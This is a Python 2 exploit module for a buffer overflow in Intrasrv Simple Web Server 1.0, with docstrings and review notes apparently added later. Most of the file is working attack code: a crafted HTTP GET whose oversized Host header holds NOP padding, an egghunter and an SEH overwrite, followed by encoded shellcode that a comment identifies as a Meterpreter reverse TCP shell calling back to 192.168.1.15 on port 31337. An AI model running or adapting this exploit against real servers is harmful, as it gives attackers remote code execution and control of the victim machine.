'''
Created on 17/08/2013

@author: hackma00100
'''
from core.red.hipnored import HipnoRed

class Intrasrv(object):
    '''
    Exploit module for the Intrasrv Simple Web Server 1.0 buffer overflow.

    Two public methods: ``viewinfo`` prints the module metadata, and
    ``exploit`` builds one crafted HTTP request and hands it to the
    project's ``HipnoRed`` network helper for a hard-coded target.
    The file is Python 2 (``print`` statement, hex escapes in plain
    ``str`` literals).
    '''


    def __init__(self):
        '''
        Constructor; keeps no instance state.  Everything ``exploit``
        needs is built locally inside that method.
        '''
        pass
    
    
    def viewinfo(self):
        '''
        Print the module metadata (name, description, version, creation
        date, author, targets, platform) to stdout.

        The ``init`` dict keys and the printed labels are Spanish and are
        part of the lookup/output contract, so they are left untouched --
        including the ``"plataform"`` spelling, which must stay in sync
        with the ``.get("plataform")`` call below.
        '''
        init = {
                    "nombre": "Intrasrv 1.0 Buffer Overflow",
                    "descripcion": \
                    "This module exploits a boundary condition error in Intrasrv Simple Web Server 1.0.\n \
                     The web interface does not validate the boundaries of an HTTP request string prior\n \
                     to copying the data to an insufficiently large buffer.\n \
                     Successful exploitation leads to arbitrary remote code execution\n \
                     in the context of the application",
                    "author": "PsychoSpy <neinwechter[at]gmail.com>",
                    "version": "1.0",
                    "fechacreacion": "May 30 2013",
                    "objetivos": "v1.0 - XP / Win7",
                    "plataform": "windows"
        }
        # Python 2 print statement.  Each .get() key below matches a key
        # of ``init``; a mismatch would print ``None`` rather than raise.
        print "Nombre: {0} \nDescripcion: {1} \nVersion: {2} \
                    \nFecha de Creacion: {3} \
                    \nAutor: {4} \
                    \nObjetivo: {5} \
                    \nPlataforma: {6}" \
                    .format(
                    init.get("nombre"),
                    init.get("descripcion"),
                    init.get("version"),
                    init.get("fechacreacion"),
                    init.get("author"),
                    init.get("objetivos"),
                    init.get("plataform")
                    )
                    
    def exploit(self):
        '''
        Build the overflow request and send it to the hard-coded ``target``.

        The request is a single HTTP GET whose ``Host`` header carries a
        4000-byte string (NOP padding, egghunter, nSEH/SEH overwrite) and
        whose body is the payload tagged ``T00WT00W``.  It is passed to
        ``HipnoRed``; nothing is returned and no response is read here.

        Review notes:
          * ``target`` is a fixed private address, and the ``80`` passed
            to ``HipnoRed`` (presumably the port) is fixed too -- neither
            is a parameter, so reuse means editing the literals.
          * The declared ``Content-Length`` does not match
            ``len(shellcode)``; presumably deliberate for this target --
            confirm before touching it.
          * Detection: the traffic is simple to signature -- a ~4 KB
            ``Host`` header dominated by 0x90 runs plus the fixed
            ``T00WT00W`` marker in the body.
        '''
        # Hard-coded private address; not configurable from the caller.
        target="192.168.56.1"
        # 32-byte egghunter followed by 94 NOPs (126 bytes in total).
        egghunter="\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x54\x30\x30\x57\x89\xd7\xaf\x75\xea\xaf\x75\xe7\xff\xe7" + "\x90"*94
        nseh="\xEB\x80\x90\x90"#short jmp back to the egghunter
        seh="\xdd\x97\x40\x00"  #0x004097dd, # pop eax # pop ebp # ret  - intrasrv.exe
        # 1427 + 126 + 4 + 4 + 2439 = 4000 bytes exactly.
        crash = "\x90"*1427 + egghunter + nseh + seh + "\x90"*2439 #4000 bytes
        #windows/meterpreter/reverse_tcp lhost=192.168.1.15 lport=31337 R | msfencode -t c -b '\x56' -e x86/alpha_mixed
        # Payload: the "T00WT00W" egg tag (matching the tag bytes inside
        # ``egghunter``) followed by the encoded body -- per the comment
        # above, produced by msfencode with 0x56 excluded.
        shellcode = ("T00WT00W" + \
        "\x89\xe0\xd9\xca\xd9\x70\xf4\x5d\x55\x59\x49\x49\x49\x49\x49"
        "\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
        "\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
        "\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
        "\x69\x6c\x59\x78\x6f\x79\x55\x50\x53\x30\x37\x70\x65\x30\x4c"
        "\x49\x79\x75\x66\x51\x5a\x72\x70\x64\x6c\x4b\x71\x42\x66\x50"
        "\x6e\x6b\x50\x52\x34\x4c\x4c\x4b\x36\x32\x74\x54\x4c\x4b\x52"
        "\x52\x47\x58\x36\x6f\x48\x37\x42\x6a\x55\x76\x65\x61\x69\x6f"
        "\x66\x51\x59\x50\x6c\x6c\x35\x6c\x71\x71\x43\x4c\x35\x52\x46"
        "\x4c\x65\x70\x5a\x61\x58\x4f\x54\x4d\x43\x31\x6b\x77\x6a\x42"
        "\x78\x70\x42\x72\x51\x47\x6e\x6b\x73\x62\x66\x70\x6c\x4b\x53"
        "\x72\x55\x6c\x57\x71\x4a\x70\x4e\x6b\x43\x70\x31\x68\x4d\x55"
        "\x79\x50\x71\x64\x51\x5a\x75\x51\x6a\x70\x52\x70\x6c\x4b\x32"
        "\x68\x34\x58\x4c\x4b\x30\x58\x37\x50\x65\x51\x39\x43\x69\x73"
        "\x35\x6c\x32\x69\x4c\x4b\x44\x74\x4e\x6b\x65\x51\x49\x46\x46"
        "\x51\x4b\x4f\x64\x71\x4b\x70\x6c\x6c\x49\x51\x4a\x6f\x44\x4d"
        "\x45\x51\x7a\x67\x76\x58\x59\x70\x73\x45\x39\x64\x77\x73\x71"
        "\x6d\x59\x68\x57\x4b\x43\x4d\x46\x44\x30\x75\x49\x72\x43\x68"
        "\x6e\x6b\x30\x58\x44\x64\x37\x71\x5a\x73\x71\x76\x6e\x6b\x36"
        "\x6c\x32\x6b\x6c\x4b\x42\x78\x35\x4c\x57\x71\x79\x43\x4e\x6b"
        "\x67\x74\x4c\x4b\x63\x31\x48\x50\x4c\x49\x43\x74\x31\x34\x37"
        "\x54\x43\x6b\x43\x6b\x51\x71\x71\x49\x63\x6a\x46\x31\x39\x6f"
        "\x4d\x30\x72\x78\x71\x4f\x71\x4a\x4c\x4b\x44\x52\x5a\x4b\x4e"
        "\x66\x73\x6d\x62\x48\x57\x43\x77\x42\x37\x70\x35\x50\x65\x38"
        "\x32\x57\x73\x43\x57\x42\x51\x4f\x50\x54\x70\x68\x52\x6c\x52"
        "\x57\x55\x76\x65\x57\x69\x6f\x49\x45\x68\x38\x4c\x50\x46\x61"
        "\x45\x50\x53\x30\x61\x39\x48\x44\x51\x44\x72\x70\x63\x58\x37"
        "\x59\x4f\x70\x50\x6b\x53\x30\x79\x6f\x4b\x65\x70\x50\x36\x30"
        "\x72\x70\x30\x50\x33\x70\x66\x30\x51\x50\x46\x30\x73\x58\x7a"
        "\x4a\x76\x6f\x79\x4f\x4b\x50\x59\x6f\x6e\x35\x4a\x37\x33\x5a"
        "\x74\x45\x53\x58\x73\x4f\x37\x70\x73\x30\x43\x31\x65\x38\x37"
        "\x72\x65\x50\x52\x5a\x42\x49\x6c\x49\x68\x66\x70\x6a\x76\x70"
        "\x53\x66\x36\x37\x50\x68\x4c\x59\x6e\x45\x71\x64\x65\x31\x69"
        "\x6f\x6b\x65\x4b\x35\x59\x50\x73\x44\x44\x4c\x6b\x4f\x32\x6e"
        "\x66\x68\x74\x35\x4a\x4c\x50\x68\x7a\x50\x48\x35\x4e\x42\x33"
        "\x66\x6b\x4f\x68\x55\x72\x4a\x45\x50\x43\x5a\x77\x74\x61\x46"
        "\x70\x57\x32\x48\x47\x72\x5a\x79\x6f\x38\x63\x6f\x6b\x4f\x39"
        "\x45\x4e\x6b\x55\x66\x33\x5a\x47\x30\x43\x58\x55\x50\x72\x30"
        "\x67\x70\x53\x30\x76\x36\x42\x4a\x65\x50\x35\x38\x46\x38\x4d"
        "\x74\x73\x63\x48\x65\x39\x6f\x59\x45\x6d\x43\x76\x33\x33\x5a"
        "\x65\x50\x53\x66\x51\x43\x53\x67\x61\x78\x66\x62\x49\x49\x49"
        "\x58\x73\x6f\x4b\x4f\x5a\x75\x36\x61\x6f\x33\x37\x59\x4f\x36"
        "\x4d\x55\x68\x76\x52\x55\x6a\x4c\x38\x43\x41\x41")
        
        # Assemble the raw request; the Host header carries the 4000-byte
        # ``crash`` buffer and the body carries ``shellcode``.
        buffer= "GET / HTTP/1.1\r\n"
        buffer+="Host: " + crash + "\r\n"
        buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
        buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1)\r\n"
        # NOTE(review): declared length is far larger than len(shellcode)
        # -- confirm this is intended before changing it.
        buffer+="Content-Length: 1048580\r\n\r\n"
        buffer+=shellcode
        # HipnoRed is project-local; beyond host and (presumably) port 80,
        # the meaning of the remaining arguments is not visible here.
        red = HipnoRed(target, 80, True,"STREAM", 4);
        # Fire-and-forget: the response, if any, is never read.
        red.send(buffer)